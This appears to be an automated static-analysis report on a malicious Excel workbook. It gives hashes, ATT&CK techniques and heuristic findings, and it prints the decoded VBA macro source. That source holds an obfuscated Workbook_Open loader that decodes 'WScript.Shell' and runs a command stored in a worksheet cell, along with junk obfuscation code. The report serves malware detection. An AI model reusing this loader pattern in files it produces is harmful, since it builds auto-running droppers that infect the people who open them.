Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 58994e3f2488e5c4…

MALICIOUS

Office (OLE)

214.5 KB Created: 2018-09-05 09:45:49 Authoring application: Microsoft Excel First seen: 2019-05-16
MD5: bac26a0f9a47dd0991e8b81dacafd544 SHA-1: 61ff7cd8f15a7639a9de7bc36ef37a8fd52ffa9c SHA-256: 58994e3f2488e5c4c87e0d24bd1b7fd2f7bfa5f21354d29ae3dc8b87042124de
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Excel file contains heavily obfuscated VBA macros, including a Workbook_Open auto-execution routine. The script utilizes `CreateObject` and `CallByName` to dynamically execute code, a common technique for downloading and running secondary payloads. The presence of both VBA and XLM macros suggests a multi-stage approach to achieve execution, likely initiated via spearphishing.

Heuristics 7

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 228 bytes
SHA-256: 962aaf1d57f0a7207e98bd37b3a4cfa339dc6a87bd287090a5d69186204feb4a
Preview script
First 1,000 lines of the extracted script
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Top
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1057 bytes
SHA-256: 97b4b3f4231fff3416260d6ae4d019ffebcb1d1e3049d0afc2008c08290fe978
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function O_(ByVal OB_ As String)
Dim SS_(2) As Integer: SS_(0) = Val("38"): SS_(1) = Val("72"): Dim AKD_ As String: Dim E_ As Long: For E_ = 1 To Len(OB_) Step 2: AKD_ = AKD_ & Chr(Val(Chr(SS_(0)) & Chr(SS_(1)) & Mid(OB_, E_, 2)) - 82): Next: O_ = AKD_
End Function
Sub Workbook_Open()
CallByName CreateObject(O_("A9A5B5C4BBC2C680A5BAB7BEBE")), O_("A4C7C0"), VbMethod, O_(ThisWorkbook.Sheets("Tope").Range("G135").Value), 0, True
End Sub
Private Function CBCC_() As String
For  = 18 To 73:YPZFLTJDZ_(aKHTPGEMI_ & WMWUPNN_(34, 4), 11)):Next i:For  = 18 To 73:YPZFLTJDZ_(aKHTPGEMI_ & WMWUPNN_(34, 4), 11)):Next i:For  = 18 To 73:YPZFLTJDZ_(aKHTPGEMI_ & WMWUPNN_(34, 4), 11)):Next i:Dim CBCC_ = ZTNPLGDPS_:
End Function